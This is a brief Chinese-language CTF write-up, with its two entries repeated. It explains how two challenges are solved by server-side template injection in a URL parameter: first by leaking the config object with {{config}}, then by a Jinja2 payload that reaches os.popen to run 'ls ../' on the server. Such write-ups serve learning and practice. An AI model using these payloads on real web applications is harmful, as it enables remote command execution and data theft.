题目
题目提示需要上交flag
查看源代码发现提示
结合题目确认为SSTI模板注入
访问设置在URL后加上?flag={{config}}找到flag
题目
题目与第一题基本一致
只是将URL后加上/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}
题目
题目提示需要上交flag
查看源代码发现提示
结合题目确认为SSTI模板注入
访问设置在URL后加上?flag={{config}}找到flag
题目
题目与第一题基本一致
只是将URL后加上/?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}